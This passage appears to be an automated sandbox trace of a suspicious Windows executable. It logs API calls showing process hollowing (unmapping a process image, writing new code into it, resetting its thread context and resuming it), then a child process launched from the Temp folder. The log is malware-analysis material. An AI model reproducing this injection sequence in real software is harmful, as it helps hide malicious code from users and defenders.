[183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.108] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0115.108] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0115.108] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0115.109] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x2d4768*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d4768*, lpNumberOfBytesWritten=0x0) returned 1 [0115.109] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x2d4b68, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0115.109] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x2d4b68*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d4b68*, lpNumberOfBytesWritten=0x0) returned 1 [0115.117] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x329168*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x329168*, lpNumberOfBytesWritten=0x0) returned 1 [0115.117] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x2d489c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d489c*, lpNumberOfBytesWritten=0x0) returned 1 [0115.118] SetThreadContext (hThread=0x48, lpContext=0x290000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.118] ResumeThread (hThread=0x48) returned 0x1 [0115.118] CloseHandle (hObject=0x48) returned 1 [0115.118] CloseHandle (hObject=0x4c) returned 1 [0115.118] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0115.119] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0115.119] ExitProcess (uExitCode=0x0) Process: id = "49" image_name = "hvgo9ckx.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe" page_root = "0x7ea16780" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0xdcc" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7780 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7781 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7782 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7783 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7784 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7785 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7786 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7787 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 7788 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7855 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7856 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7857 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7858 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 7859 start_va = 0x6f0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 7860 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7861 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7862 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7863 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7864 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7865 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7866 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7867 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7868 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7869 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7870 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7871 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7872 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7873 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7874 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7875 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7876 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7964 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7965 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7966 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7967 start_va = 0x7f0000 end_va = 0x13effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 7968 start_va = 0x13f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 7969 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7970 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7971 start_va = 0x1530000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 7977 start_va = 0x16c0000 end_va = 0x198efff entry_point = 0x16c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7978 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 7979 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 7982 start_va = 0x1530000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 7983 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 7984 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7985 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7986 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7987 start_va = 0x350000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 7988 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7989 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8014 start_va = 0x1990000 end_va = 0x1a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 8015 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8016 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 79 os_tid = 0xdec [0115.482] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.482] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0115.482] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 